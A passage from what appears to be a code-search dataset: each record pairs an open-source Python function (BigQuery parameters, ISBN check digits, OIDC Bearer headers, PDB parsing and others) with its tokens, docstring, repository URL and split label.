[ "def", "guest_reboot", "(", "self", ",", "userid", ")", ":", "LOG", ".", "info", "(", "\"Begin to reboot vm %s\"", ",", "userid", ")", "self", ".", "_smtclient", ".", "guest_reboot", "(", "userid", ")", "LOG", ".", "info", "(", "\"Complete reboot vm %s\"", ",", "userid", ")" ]
Reboot a guest vm.
[ "Reboot", "a", "guest", "vm", "." ]
python
train
sentinel-hub/sentinelhub-py
sentinelhub/constants.py
https://github.com/sentinel-hub/sentinelhub-py/blob/08a83b7f1e289187159a643336995d8369860fea/sentinelhub/constants.py#L242-L254
def _get_utm_name_value_pair(zone, direction=_Direction.NORTH): """ Get name and code for UTM coordinates :param zone: UTM zone number :type zone: int :param direction: Direction enum type :type direction: Enum, optional (default=NORTH) :return: Name and code of UTM coordinates :rtype: str, str """ name = 'UTM_{}{}'.format(zone, direction.value) epsg = _get_utm_code(zone, direction) return name, epsg
[ "def", "_get_utm_name_value_pair", "(", "zone", ",", "direction", "=", "_Direction", ".", "NORTH", ")", ":", "name", "=", "'UTM_{}{}'", ".", "format", "(", "zone", ",", "direction", ".", "value", ")", "epsg", "=", "_get_utm_code", "(", "zone", ",", "direction", ")", "return", "name", ",", "epsg" ]
Get name and code for UTM coordinates :param zone: UTM zone number :type zone: int :param direction: Direction enum type :type direction: Enum, optional (default=NORTH) :return: Name and code of UTM coordinates :rtype: str, str
[ "Get", "name", "and", "code", "for", "UTM", "coordinates" ]
python
train
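A worked pair for the builder above, assuming _get_utm_code follows the standard EPSG numbering for UTM (326xx for the northern hemisphere, 327xx for the southern); that numbering is a general fact, but its use inside _get_utm_code is an assumption:

def get_utm_code(zone, north=True):
    # Standard EPSG layout: 32600 + zone (north), 32700 + zone (south).
    return str((32600 if north else 32700) + zone)

print('UTM_{}{}'.format(33, 'N'), get_utm_code(33))          # UTM_33N 32633
print('UTM_{}{}'.format(33, 'S'), get_utm_code(33, False))   # UTM_33S 32733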
kodexlab/reliure
reliure/offline.py
https://github.com/kodexlab/reliure/blob/0450c7a9254c5c003162738458bbe0c49e777ba5/reliure/offline.py#L11-L45
def run(pipeline, input_gen, options={}): """ Run a pipeline over a input generator >>> # if we have a simple component >>> from reliure.pipeline import Composable >>> @Composable ... def print_each(letters): ... for letter in letters: ... print(letter) ... yield letter >>> # that we want to run over a given input: >>> input = "abcde" >>> # we just have to do : >>> res = run(print_each, input) a b c d e it is also possible to run any reliure pipeline this way: >>> import string >>> pipeline = Composable(lambda letters: (l.upper() for l in letters)) | print_each >>> res = run(pipeline, input) A B C D E """ logger = logging.getLogger("reliure.run") t0 = time() res = [output for output in pipeline(input_gen, **options)] logger.info("Pipeline executed in %1.3f sec" % (time() - t0)) return res
[ "def", "run", "(", "pipeline", ",", "input_gen", ",", "options", "=", "{", "}", ")", ":", "logger", "=", "logging", ".", "getLogger", "(", "\"reliure.run\"", ")", "t0", "=", "time", "(", ")", "res", "=", "[", "output", "for", "output", "in", "pipeline", "(", "input_gen", ",", "*", "*", "options", ")", "]", "logger", ".", "info", "(", "\"Pipeline executed in %1.3f sec\"", "%", "(", "time", "(", ")", "-", "t0", ")", ")", "return", "res" ]
Run a pipeline over an input generator >>> # if we have a simple component >>> from reliure.pipeline import Composable >>> @Composable ... def print_each(letters): ... for letter in letters: ... print(letter) ... yield letter >>> # that we want to run over a given input: >>> input = "abcde" >>> # we just have to do : >>> res = run(print_each, input) a b c d e it is also possible to run any reliure pipeline this way: >>> import string >>> pipeline = Composable(lambda letters: (l.upper() for l in letters)) | print_each >>> res = run(pipeline, input) A B C D E
[ "Run", "a", "pipeline", "over", "a", "input", "generator" ]
python
train
openid/JWTConnect-Python-OidcService
src/oidcservice/client_auth.py
https://github.com/openid/JWTConnect-Python-OidcService/blob/759ab7adef30a7e3b9d75475e2971433b9613788/src/oidcservice/client_auth.py#L225-L260
def construct(self, request=None, service=None, http_args=None, **kwargs): """ Constructing the Authorization header. The value of the Authorization header is "Bearer <access_token>". :param request: Request class instance :param service: Service :param http_args: HTTP header arguments :param kwargs: extra keyword arguments :return: """ if service.service_name == 'refresh_token': _acc_token = find_token(request, 'refresh_token', service, **kwargs) else: _acc_token = find_token(request, 'access_token', service, **kwargs) if not _acc_token: raise KeyError('No access or refresh token available') # The authorization value starts with 'Bearer' when bearer tokens # are used _bearer = "Bearer {}".format(_acc_token) # Add 'Authorization' to the headers if http_args is None: http_args = {"headers": {}} http_args["headers"]["Authorization"] = _bearer else: try: http_args["headers"]["Authorization"] = _bearer except KeyError: http_args["headers"] = {"Authorization": _bearer} return http_args
[ "def", "construct", "(", "self", ",", "request", "=", "None", ",", "service", "=", "None", ",", "http_args", "=", "None", ",", "*", "*", "kwargs", ")", ":", "if", "service", ".", "service_name", "==", "'refresh_token'", ":", "_acc_token", "=", "find_token", "(", "request", ",", "'refresh_token'", ",", "service", ",", "*", "*", "kwargs", ")", "else", ":", "_acc_token", "=", "find_token", "(", "request", ",", "'access_token'", ",", "service", ",", "*", "*", "kwargs", ")", "if", "not", "_acc_token", ":", "raise", "KeyError", "(", "'No access or refresh token available'", ")", "# The authorization value starts with 'Bearer' when bearer tokens", "# are used", "_bearer", "=", "\"Bearer {}\"", ".", "format", "(", "_acc_token", ")", "# Add 'Authorization' to the headers", "if", "http_args", "is", "None", ":", "http_args", "=", "{", "\"headers\"", ":", "{", "}", "}", "http_args", "[", "\"headers\"", "]", "[", "\"Authorization\"", "]", "=", "_bearer", "else", ":", "try", ":", "http_args", "[", "\"headers\"", "]", "[", "\"Authorization\"", "]", "=", "_bearer", "except", "KeyError", ":", "http_args", "[", "\"headers\"", "]", "=", "{", "\"Authorization\"", ":", "_bearer", "}", "return", "http_args" ]
Constructing the Authorization header. The value of the Authorization header is "Bearer <access_token>". :param request: Request class instance :param service: Service :param http_args: HTTP header arguments :param kwargs: extra keyword arguments :return:
[ "Constructing", "the", "Authorization", "header", ".", "The", "value", "of", "the", "Authorization", "header", "is", "Bearer", "<access_token", ">", "." ]
python
train
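The header shape produced by construct() above, as a standalone sketch of the same merge logic (the token value is illustrative):

def add_bearer(http_args, access_token):
    bearer = 'Bearer {}'.format(access_token)
    if http_args is None:
        http_args = {'headers': {}}
    http_args.setdefault('headers', {})['Authorization'] = bearer
    return http_args

print(add_bearer(None, 'ZjQxNzc'))
# {'headers': {'Authorization': 'Bearer ZjQxNzc'}}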
zeromake/aiosqlite3
aiosqlite3/pool.py
https://github.com/zeromake/aiosqlite3/blob/1a74a062507e2df8f833a70885e69dca0ab3e7e7/aiosqlite3/pool.py#L194-L211
def sync_close(self): """ 同步关闭 """ if self._closed: return while self._free: conn = self._free.popleft() if not conn.closed: # pragma: no cover conn.sync_close() for conn in self._used: if not conn.closed: # pragma: no cover conn.sync_close() self._terminated.add(conn) self._used.clear() self._closed = True
[ "def", "sync_close", "(", "self", ")", ":", "if", "self", ".", "_closed", ":", "return", "while", "self", ".", "_free", ":", "conn", "=", "self", ".", "_free", ".", "popleft", "(", ")", "if", "not", "conn", ".", "closed", ":", "# pragma: no cover", "conn", ".", "sync_close", "(", ")", "for", "conn", "in", "self", ".", "_used", ":", "if", "not", "conn", ".", "closed", ":", "# pragma: no cover", "conn", ".", "sync_close", "(", ")", "self", ".", "_terminated", ".", "add", "(", "conn", ")", "self", ".", "_used", ".", "clear", "(", ")", "self", ".", "_closed", "=", "True" ]
Close the pool synchronously.
[ "同步关闭" ]
python
train
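The close pattern above (idempotence guard, drain the idle deque, then close in-use connections) generalizes; a minimal sketch with a toy pool, assuming connection objects with a close() method:

from collections import deque

class TinyPool:
    def __init__(self, conns):
        self._free, self._used = deque(conns), set()
        self._closed = False

    def sync_close(self):
        if self._closed:            # calling twice is a no-op
            return
        while self._free:           # close idle connections first
            self._free.popleft().close()
        for conn in self._used:     # then connections still handed out
            conn.close()
        self._used.clear()
        self._closed = True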
kgori/treeCl
treeCl/distance_matrix.py
https://github.com/kgori/treeCl/blob/fed624b3db1c19cc07175ca04e3eda6905a8d305/treeCl/distance_matrix.py#L371-L384
def _embedding_nonmetric_mds(matrix, dimensions=3, initial_coords=None): """ Private method to calculate NMMDS embedding :param dimensions: (int) :return: coordinate matrix (np.array) """ mds = sklearn.manifold.MDS(n_components=dimensions, dissimilarity='precomputed', metric=False) if initial_coords is not None: mds.fit(matrix, init=initial_coords) else: mds.fit(matrix) return mds.embedding_
[ "def", "_embedding_nonmetric_mds", "(", "matrix", ",", "dimensions", "=", "3", ",", "initial_coords", "=", "None", ")", ":", "mds", "=", "sklearn", ".", "manifold", ".", "MDS", "(", "n_components", "=", "dimensions", ",", "dissimilarity", "=", "'precomputed'", ",", "metric", "=", "False", ")", "if", "initial_coords", "is", "not", "None", ":", "mds", ".", "fit", "(", "matrix", ",", "init", "=", "initial_coords", ")", "else", ":", "mds", ".", "fit", "(", "matrix", ")", "return", "mds", ".", "embedding_" ]
Private method to calculate NMMDS embedding :param dimensions: (int) :return: coordinate matrix (np.array)
[ "Private", "method", "to", "calculate", "NMMDS", "embedding", ":", "param", "dimensions", ":", "(", "int", ")", ":", "return", ":", "coordinate", "matrix", "(", "np", ".", "array", ")" ]
python
train
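Driving the embedding above with a small symmetric dissimilarity matrix; sklearn's MDS with dissimilarity='precomputed' and metric=False performs the non-metric fit:

import numpy as np
import sklearn.manifold

matrix = np.array([[0.0, 1.0, 2.0],      # symmetric, zero diagonal (illustrative)
                   [1.0, 0.0, 1.5],
                   [2.0, 1.5, 0.0]])
mds = sklearn.manifold.MDS(n_components=2, dissimilarity='precomputed',
                           metric=False)
coords = mds.fit(matrix).embedding_       # one 2-D coordinate row per object
print(coords.shape)                        # (3, 2)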
googleapis/google-cloud-python
bigquery/google/cloud/bigquery/query.py
https://github.com/googleapis/google-cloud-python/blob/85e80125a59cb10f8cb105f25ecc099e4b940b50/bigquery/google/cloud/bigquery/query.py#L256-L279
def to_api_repr(self): """Construct JSON API representation for the parameter. :rtype: dict :returns: JSON mapping """ values = self.values if self.array_type == "RECORD" or self.array_type == "STRUCT": reprs = [value.to_api_repr() for value in values] a_type = reprs[0]["parameterType"] a_values = [repr_["parameterValue"] for repr_ in reprs] else: a_type = {"type": self.array_type} converter = _SCALAR_VALUE_TO_JSON_PARAM.get(self.array_type) if converter is not None: values = [converter(value) for value in values] a_values = [{"value": value} for value in values] resource = { "parameterType": {"type": "ARRAY", "arrayType": a_type}, "parameterValue": {"arrayValues": a_values}, } if self.name is not None: resource["name"] = self.name return resource
[ "def", "to_api_repr", "(", "self", ")", ":", "values", "=", "self", ".", "values", "if", "self", ".", "array_type", "==", "\"RECORD\"", "or", "self", ".", "array_type", "==", "\"STRUCT\"", ":", "reprs", "=", "[", "value", ".", "to_api_repr", "(", ")", "for", "value", "in", "values", "]", "a_type", "=", "reprs", "[", "0", "]", "[", "\"parameterType\"", "]", "a_values", "=", "[", "repr_", "[", "\"parameterValue\"", "]", "for", "repr_", "in", "reprs", "]", "else", ":", "a_type", "=", "{", "\"type\"", ":", "self", ".", "array_type", "}", "converter", "=", "_SCALAR_VALUE_TO_JSON_PARAM", ".", "get", "(", "self", ".", "array_type", ")", "if", "converter", "is", "not", "None", ":", "values", "=", "[", "converter", "(", "value", ")", "for", "value", "in", "values", "]", "a_values", "=", "[", "{", "\"value\"", ":", "value", "}", "for", "value", "in", "values", "]", "resource", "=", "{", "\"parameterType\"", ":", "{", "\"type\"", ":", "\"ARRAY\"", ",", "\"arrayType\"", ":", "a_type", "}", ",", "\"parameterValue\"", ":", "{", "\"arrayValues\"", ":", "a_values", "}", ",", "}", "if", "self", ".", "name", "is", "not", "None", ":", "resource", "[", "\"name\"", "]", "=", "self", ".", "name", "return", "resource" ]
Construct JSON API representation for the parameter. :rtype: dict :returns: JSON mapping
[ "Construct", "JSON", "API", "representation", "for", "the", "parameter", "." ]
python
train
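For a scalar array type, the structure assembled by to_api_repr() above comes out as plain dicts. A hedged sketch of the expected shape for an INT64 array parameter named 'sizes'; showing the values as strings assumes the scalar converter follows BigQuery's string encoding for INT64:

expected = {
    'name': 'sizes',
    'parameterType': {'type': 'ARRAY', 'arrayType': {'type': 'INT64'}},
    'parameterValue': {'arrayValues': [{'value': '1'}, {'value': '2'}]},
}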
trevisanj/a99
a99/gui/_logpart.py
https://github.com/trevisanj/a99/blob/193e6e3c9b3e4f4a0ba7eb3eece846fe7045c539/a99/gui/_logpart.py#L24-L38
def add_log_error(self, x, flag_also_show=False, E=None): """Sets text of labelError.""" if len(x) == 0: x = "(empty error)" tb.print_stack() x_ = x if E is not None: a99.get_python_logger().exception(x_) else: a99.get_python_logger().info("ERROR: {}".format(x_)) x = '<span style="color: {0!s}">{1!s}</span>'.format(a99.COLOR_ERROR, x) self._add_log_no_logger(x, False) if flag_also_show: a99.show_error(x_)
[ "def", "add_log_error", "(", "self", ",", "x", ",", "flag_also_show", "=", "False", ",", "E", "=", "None", ")", ":", "if", "len", "(", "x", ")", "==", "0", ":", "x", "=", "\"(empty error)\"", "tb", ".", "print_stack", "(", ")", "x_", "=", "x", "if", "E", "is", "not", "None", ":", "a99", ".", "get_python_logger", "(", ")", ".", "exception", "(", "x_", ")", "else", ":", "a99", ".", "get_python_logger", "(", ")", ".", "info", "(", "\"ERROR: {}\"", ".", "format", "(", "x_", ")", ")", "x", "=", "'<span style=\"color: {0!s}\">{1!s}</span>'", ".", "format", "(", "a99", ".", "COLOR_ERROR", ",", "x", ")", "self", ".", "_add_log_no_logger", "(", "x", ",", "False", ")", "if", "flag_also_show", ":", "a99", ".", "show_error", "(", "x_", ")" ]
Sets text of labelError.
[ "Sets", "text", "of", "labelError", "." ]
python
train
joke2k/faker
faker/providers/isbn/isbn.py
https://github.com/joke2k/faker/blob/965824b61132e52d92d1a6ce470396dbbe01c96c/faker/providers/isbn/isbn.py#L25-L36
def _check_digit(self): """ Calculate the check digit for ISBN-13. See https://en.wikipedia.org/wiki/International_Standard_Book_Number for calculation. """ weights = (1 if x % 2 == 0 else 3 for x in range(12)) body = ''.join([self.ean, self.group, self.registrant, self.publication]) remainder = sum(int(b) * w for b, w in zip(body, weights)) % 10 diff = 10 - remainder check_digit = 0 if diff == 10 else diff return str(check_digit)
[ "def", "_check_digit", "(", "self", ")", ":", "weights", "=", "(", "1", "if", "x", "%", "2", "==", "0", "else", "3", "for", "x", "in", "range", "(", "12", ")", ")", "body", "=", "''", ".", "join", "(", "[", "self", ".", "ean", ",", "self", ".", "group", ",", "self", ".", "registrant", ",", "self", ".", "publication", "]", ")", "remainder", "=", "sum", "(", "int", "(", "b", ")", "*", "w", "for", "b", ",", "w", "in", "zip", "(", "body", ",", "weights", ")", ")", "%", "10", "diff", "=", "10", "-", "remainder", "check_digit", "=", "0", "if", "diff", "==", "10", "else", "diff", "return", "str", "(", "check_digit", ")" ]
Calculate the check digit for ISBN-13. See https://en.wikipedia.org/wiki/International_Standard_Book_Number for calculation.
[ "Calculate", "the", "check", "digit", "for", "ISBN", "-", "13", ".", "See", "https", ":", "//", "en", ".", "wikipedia", ".", "org", "/", "wiki", "/", "International_Standard_Book_Number", "for", "calculation", "." ]
python
train
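A worked instance of the weighting in _check_digit above, for the well-known ISBN 978-0-306-40615-7: weights alternate 1 and 3 over the first twelve digits, and the check digit completes the weighted sum to a multiple of 10:

body = '978030640615'   # ean + group + registrant + publication, concatenated
weights = (1 if i % 2 == 0 else 3 for i in range(12))
remainder = sum(int(b) * w for b, w in zip(body, weights)) % 10   # 93 % 10 = 3
check = 0 if (10 - remainder) == 10 else 10 - remainder
print(check)            # 7, matching the published check digit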
learningequality/ricecooker
ricecooker/utils/data_writer.py
https://github.com/learningequality/ricecooker/blob/2f0385282500cb77ef2894646c6f9ce11bd7a853/ricecooker/utils/data_writer.py#L148-L180
def add_file(self, path, title, download_url, write_data=True, ext=None, license=None, copyright_holder=None, **node_data): """ add_file: Creates file in csv and writes file to zip Args: path: (str) where in zip to write file title: (str) content's title download_url: (str) url or local path to download from write_data: (boolean) indicates whether to add as a csv entry (optional) ext: (str) extension to use for file license (str): content's license copyright_holder (str): holder of content's license (required except for PUBLIC_DOMAIN) license_description (str): description of content's license (optional) source_id: (str) content's original id (optional) description: (str) description of content (optional) author (str): who created the content (optional) language (str): language of content (optional) thumbnail (str): path to thumbnail in zip (optional) Returns: path to file in zip """ if write_data: assert license, "Files must have a license" copyright_holder = None if not copyright_holder or copyright_holder.strip() == '' else copyright_holder assert license in NO_COPYRIGHT_HOLDER_REQUIRED or copyright_holder, "Licenses must have a copyright holder if they are not public domain" self._parse_path(path) if not ext: _name, ext = os.path.splitext(download_url or "") ext = ext.lower() # normalize to lowercase extensions inside zip archive filepath = "{}/{}{}".format(path, title, ext) if download_url and filepath: self._write_to_zip(filepath, read(download_url)) if write_data: self._commit(filepath, title, license=license, copyright_holder=copyright_holder, **node_data) return filepath
[ "def", "add_file", "(", "self", ",", "path", ",", "title", ",", "download_url", ",", "write_data", "=", "True", ",", "ext", "=", "None", ",", "license", "=", "None", ",", "copyright_holder", "=", "None", ",", "*", "*", "node_data", ")", ":", "if", "write_data", ":", "assert", "license", ",", "\"Files must have a license\"", "copyright_holder", "=", "None", "if", "not", "copyright_holder", "or", "copyright_holder", ".", "strip", "(", ")", "==", "''", "else", "copyright_holder", "assert", "license", "in", "NO_COPYRIGHT_HOLDER_REQUIRED", "or", "copyright_holder", ",", "\"Licenses must have a copyright holder if they are not public domain\"", "self", ".", "_parse_path", "(", "path", ")", "if", "not", "ext", ":", "_name", ",", "ext", "=", "os", ".", "path", ".", "splitext", "(", "download_url", "or", "\"\"", ")", "ext", "=", "ext", ".", "lower", "(", ")", "# normalize to lowercase extensions inside zip archive", "filepath", "=", "\"{}/{}{}\"", ".", "format", "(", "path", ",", "title", ",", "ext", ")", "if", "download_url", "and", "filepath", ":", "self", ".", "_write_to_zip", "(", "filepath", ",", "read", "(", "download_url", ")", ")", "if", "write_data", ":", "self", ".", "_commit", "(", "filepath", ",", "title", ",", "license", "=", "license", ",", "copyright_holder", "=", "copyright_holder", ",", "*", "*", "node_data", ")", "return", "filepath" ]
add_file: Creates file in csv and writes file to zip Args: path: (str) where in zip to write file title: (str) content's title download_url: (str) url or local path to download from write_data: (boolean) indicates whether to add as a csv entry (optional) ext: (str) extension to use for file license (str): content's license copyright_holder (str): holder of content's license (required except for PUBLIC_DOMAIN) license_description (str): description of content's license (optional) source_id: (str) content's original id (optional) description: (str) description of content (optional) author (str): who created the content (optional) language (str): language of content (optional) thumbnail (str): path to thumbnail in zip (optional) Returns: path to file in zip
[ "add_file", ":", "Creates", "file", "in", "csv", "and", "writes", "file", "to", "zip", "Args", ":", "path", ":", "(", "str", ")", "where", "in", "zip", "to", "write", "file", "title", ":", "(", "str", ")", "content", "s", "title", "download_url", ":", "(", "str", ")", "url", "or", "local", "path", "to", "download", "from", "write_data", ":", "(", "boolean", ")", "indicates", "whether", "to", "add", "as", "a", "csv", "entry", "(", "optional", ")", "ext", ":", "(", "str", ")", "extension", "to", "use", "for", "file", "license", "(", "str", ")", ":", "content", "s", "license", "copyright_holder", "(", "str", ")", ":", "holder", "of", "content", "s", "license", "(", "required", "except", "for", "PUBLIC_DOMAIN", ")", "license_description", "(", "str", ")", ":", "description", "of", "content", "s", "license", "(", "optional", ")", "source_id", ":", "(", "str", ")", "content", "s", "original", "id", "(", "optional", ")", "description", ":", "(", "str", ")", "description", "of", "content", "(", "optional", ")", "author", "(", "str", ")", ":", "who", "created", "the", "content", "(", "optional", ")", "language", "(", "str", ")", ":", "language", "of", "content", "(", "optional", ")", "thumbnail", "(", "str", ")", ":", "path", "to", "thumbnail", "in", "zip", "(", "optional", ")", "Returns", ":", "path", "to", "file", "in", "zip" ]
python
train
a1ezzz/wasp-general
wasp_general/network/service.py
https://github.com/a1ezzz/wasp-general/blob/1029839d33eb663f8dec76c1c46754d53c1de4a9/wasp_general/network/service.py#L104-L114
def start(self): """ Set up handler and start loop :return: None """ timeout = self.timeout() if timeout is not None and timeout > 0: self.__loop.add_timeout(timedelta(0, timeout), self.stop) self.handler().setup_handler(self.loop()) self.loop().start() self.handler().loop_stopped()
[ "def", "start", "(", "self", ")", ":", "timeout", "=", "self", ".", "timeout", "(", ")", "if", "timeout", "is", "not", "None", "and", "timeout", ">", "0", ":", "self", ".", "__loop", ".", "add_timeout", "(", "timedelta", "(", "0", ",", "timeout", ")", ",", "self", ".", "stop", ")", "self", ".", "handler", "(", ")", ".", "setup_handler", "(", "self", ".", "loop", "(", ")", ")", "self", ".", "loop", "(", ")", ".", "start", "(", ")", "self", ".", "handler", "(", ")", ".", "loop_stopped", "(", ")" ]
Set up handler and start loop :return: None
[ "Set", "up", "handler", "and", "start", "loop" ]
python
train
cqparts/cqparts
src/cqparts_motors/stepper.py
https://github.com/cqparts/cqparts/blob/018e87e14c2c4d1d40b4bfe6a7e22bcf9baf0a53/src/cqparts_motors/stepper.py#L200-L205
def apply_cutout(self): " shaft cutout " stepper_shaft = self.components['shaft'] top = self.components['topcap'] local_obj = top.local_obj local_obj = local_obj.cut(stepper_shaft.get_cutout(clearance=0.5))
[ "def", "apply_cutout", "(", "self", ")", ":", "stepper_shaft", "=", "self", ".", "components", "[", "'shaft'", "]", "top", "=", "self", ".", "components", "[", "'topcap'", "]", "local_obj", "=", "top", ".", "local_obj", "local_obj", "=", "local_obj", ".", "cut", "(", "stepper_shaft", ".", "get_cutout", "(", "clearance", "=", "0.5", ")", ")" ]
shaft cutout
[ "shaft", "cutout" ]
python
train
bradmontgomery/django-redis-metrics
redis_metrics/templatetags/redis_metric_tags.py
https://github.com/bradmontgomery/django-redis-metrics/blob/2c92332920113d28c39234b949aa496b39a091d1/redis_metrics/templatetags/redis_metric_tags.py#L93-L112
def metric_detail(slug, with_data_table=False): """Template Tag to display a metric's *current* detail. * ``slug`` -- the metric's unique slug * ``with_data_table`` -- if True, prints the raw data in a table. """ r = get_r() granularities = list(r._granularities()) metrics = r.get_metric(slug) metrics_data = [] for g in granularities: metrics_data.append((g, metrics[g])) return { 'granularities': [g.title() for g in granularities], 'slug': slug, 'metrics': metrics_data, 'with_data_table': with_data_table, }
[ "def", "metric_detail", "(", "slug", ",", "with_data_table", "=", "False", ")", ":", "r", "=", "get_r", "(", ")", "granularities", "=", "list", "(", "r", ".", "_granularities", "(", ")", ")", "metrics", "=", "r", ".", "get_metric", "(", "slug", ")", "metrics_data", "=", "[", "]", "for", "g", "in", "granularities", ":", "metrics_data", ".", "append", "(", "(", "g", ",", "metrics", "[", "g", "]", ")", ")", "return", "{", "'granularities'", ":", "[", "g", ".", "title", "(", ")", "for", "g", "in", "granularities", "]", ",", "'slug'", ":", "slug", ",", "'metrics'", ":", "metrics_data", ",", "'with_data_table'", ":", "with_data_table", ",", "}" ]
Template Tag to display a metric's *current* detail. * ``slug`` -- the metric's unique slug * ``with_data_table`` -- if True, prints the raw data in a table.
[ "Template", "Tag", "to", "display", "a", "metric", "s", "*", "current", "*", "detail", "." ]
python
train
tornadoweb/tornado
tornado/util.py
https://github.com/tornadoweb/tornado/blob/b8b481770bcdb333a69afde5cce7eaa449128326/tornado/util.py#L103-L114
def decompress(self, value: bytes, max_length: int = 0) -> bytes: """Decompress a chunk, returning newly-available data. Some data may be buffered for later processing; `flush` must be called when there is no more input data to ensure that all data was processed. If ``max_length`` is given, some input data may be left over in ``unconsumed_tail``; you must retrieve this value and pass it back to a future call to `decompress` if it is not empty. """ return self.decompressobj.decompress(value, max_length)
[ "def", "decompress", "(", "self", ",", "value", ":", "bytes", ",", "max_length", ":", "int", "=", "0", ")", "->", "bytes", ":", "return", "self", ".", "decompressobj", ".", "decompress", "(", "value", ",", "max_length", ")" ]
Decompress a chunk, returning newly-available data. Some data may be buffered for later processing; `flush` must be called when there is no more input data to ensure that all data was processed. If ``max_length`` is given, some input data may be left over in ``unconsumed_tail``; you must retrieve this value and pass it back to a future call to `decompress` if it is not empty.
[ "Decompress", "a", "chunk", "returning", "newly", "-", "available", "data", "." ]
python
train
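The underlying zlib object implements the contract the docstring above describes; a stdlib-only sketch of the max_length / unconsumed_tail behavior:

import zlib

payload = zlib.compress(b'x' * 10000)
d = zlib.decompressobj()
chunk = d.decompress(payload, 64)     # at most 64 bytes returned now
leftover = d.unconsumed_tail          # input held back; must be fed in again
rest = d.decompress(leftover) + d.flush()
print(len(chunk) + len(rest))         # 10000 once fully drained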
Kortemme-Lab/klab
klab/bio/pdb.py
https://github.com/Kortemme-Lab/klab/blob/6d410ad08f1bd9f7cbbb28d7d946e94fbaaa2b6b/klab/bio/pdb.py#L2115-L2234
def GetRosettaResidueMap(self, ConvertMSEToAtom = False, RemoveIncompleteFinalResidues = False, RemoveIncompleteResidues = False): '''Note: This function ignores any DNA.''' raise Exception('This code looks to be deprecated. Use construct_pdb_to_rosetta_residue_map instead.') chain = None sequences = {} residue_map = {} resid_set = set() resid_list = [] DNA_residues = set([' DA', ' DC', ' DG', ' DT']) chains = [] self.RAW_ATOM_SEQUENCE = [] essential_atoms_1 = set(['CA', 'C', 'N'])#, 'O']) essential_atoms_2 = set(['CA', 'C', 'N'])#, 'OG']) current_atoms = set() atoms_read = {} oldchainID = None removed_residue = {} for line in self.lines: if line[0:4] == 'ATOM' or (ConvertMSEToAtom and (line[0:6] == 'HETATM') and (line[17:20] == 'MSE')): chainID = line[21] if missing_chain_ids.get(self.pdb_id): chainID = missing_chain_ids[self.pdb_id] if chainID not in chains: chains.append(chainID) residue_longname = line[17:20] if residue_longname in DNA_residues: # Skip DNA continue if residue_longname == 'UNK': # Skip unknown residues continue if residue_longname not in allowed_PDB_residues_types and not(ConvertMSEToAtom and residue_longname == 'MSE'): if not self.strict: # Skip unknown residues continue else: raise NonCanonicalResidueException("Residue %s encountered: %s" % (line[17:20], line)) else: resid = line[21:27] #print(chainID, residue_longname, resid) #print(line) #print(resid_list) if resid not in resid_set: removed_residue[chainID] = False add_residue = True if current_atoms: if RemoveIncompleteResidues and essential_atoms_1.intersection(current_atoms) != essential_atoms_1 and essential_atoms_2.intersection(current_atoms) != essential_atoms_2: oldChain = resid_list[-1][0] oldResidueID = resid_list[-1][1:] print("The last residue '%s', %s, in chain %s is missing these atoms: %s." % (resid_list[-1], residue_longname, oldChain, essential_atoms_1.difference(current_atoms) or essential_atoms_2.difference(current_atoms))) resid_set.remove(resid_list[-1]) #print("".join(resid_list)) resid_list = resid_list[:-1] if oldchainID: removed_residue[oldchainID] = True #print("".join(resid_list)) #print(sequences[oldChain]) if sequences.get(oldChain): sequences[oldChain] = sequences[oldChain][:-1] if residue_map.get(oldChain): residue_map[oldChain] = residue_map[oldChain][:-1] #print(sequences[oldChain] else: assert(not(resid_set)) current_atoms = set() atoms_read[chainID] = set() atoms_read[chainID].add(line[12:15].strip()) resid_set.add(resid) resid_list.append(resid) chainID = line[21] sequences[chainID] = sequences.get(chainID, []) if residue_longname in non_canonical_amino_acids: sequences[chainID].append(non_canonical_amino_acids[residue_longname]) else: sequences[chainID].append(residue_type_3to1_map[residue_longname]) residue_map[chainID] = residue_map.get(chainID, []) if residue_longname in non_canonical_amino_acids: residue_map[chainID].append((resid, non_canonical_amino_acids[residue_longname])) else: residue_map[chainID].append((resid, residue_type_3to1_map[residue_longname])) oldchainID = chainID else: #atoms_read[chainID] = atoms_read.get(chainID, set()) atoms_read[chainID].add(line[12:15].strip()) current_atoms.add(line[12:15].strip()) if RemoveIncompleteFinalResidues: # These are (probably) necessary for Rosetta to keep the residue. Rosetta does throw away residues where only the N atom is present if that residue is at the end of a chain. for chainID, sequence_list in sequences.iteritems(): if not(removed_residue[chainID]): if essential_atoms_1.intersection(atoms_read[chainID]) != essential_atoms_1 and essential_atoms_2.intersection(atoms_read[chainID]) != essential_atoms_2: print("The last residue %s of chain %s is missing these atoms: %s." % (sequence_list[-1], chainID, essential_atoms_1.difference(atoms_read[chainID]) or essential_atoms_2.difference(atoms_read[chainID]))) oldResidueID = sequence_list[-1][1:] residue_map[chainID] = residue_map[chainID][0:-1] sequences[chainID] = sequence_list[0:-1] for chainID, sequence_list in sequences.iteritems(): sequences[chainID] = "".join(sequence_list) assert(sequences[chainID] == "".join([res_details[1] for res_details in residue_map[chainID]])) for chainID in chains: for a_acid in sequences.get(chainID, ""): self.RAW_ATOM_SEQUENCE.append((chainID, a_acid)) residue_objects = {} for chainID in residue_map.keys(): residue_objects[chainID] = [] for chainID, residue_list in residue_map.iteritems(): for res_pair in residue_list: resid = res_pair[0] resaa = res_pair[1] assert(resid[0] == chainID) residue_objects[chainID].append((resid[1:].strip(), resaa)) return sequences, residue_objects
[ "def", "GetRosettaResidueMap", "(", "self", ",", "ConvertMSEToAtom", "=", "False", ",", "RemoveIncompleteFinalResidues", "=", "False", ",", "RemoveIncompleteResidues", "=", "False", ")", ":", "raise", "Exception", "(", "'This code looks to be deprecated. Use construct_pdb_to_rosetta_residue_map instead.'", ")", "chain", "=", "None", "sequences", "=", "{", "}", "residue_map", "=", "{", "}", "resid_set", "=", "set", "(", ")", "resid_list", "=", "[", "]", "DNA_residues", "=", "set", "(", "[", "' DA'", ",", "' DC'", ",", "' DG'", ",", "' DT'", "]", ")", "chains", "=", "[", "]", "self", ".", "RAW_ATOM_SEQUENCE", "=", "[", "]", "essential_atoms_1", "=", "set", "(", "[", "'CA'", ",", "'C'", ",", "'N'", "]", ")", "#, 'O'])", "essential_atoms_2", "=", "set", "(", "[", "'CA'", ",", "'C'", ",", "'N'", "]", ")", "#, 'OG'])", "current_atoms", "=", "set", "(", ")", "atoms_read", "=", "{", "}", "oldchainID", "=", "None", "removed_residue", "=", "{", "}", "for", "line", "in", "self", ".", "lines", ":", "if", "line", "[", "0", ":", "4", "]", "==", "'ATOM'", "or", "(", "ConvertMSEToAtom", "and", "(", "line", "[", "0", ":", "6", "]", "==", "'HETATM'", ")", "and", "(", "line", "[", 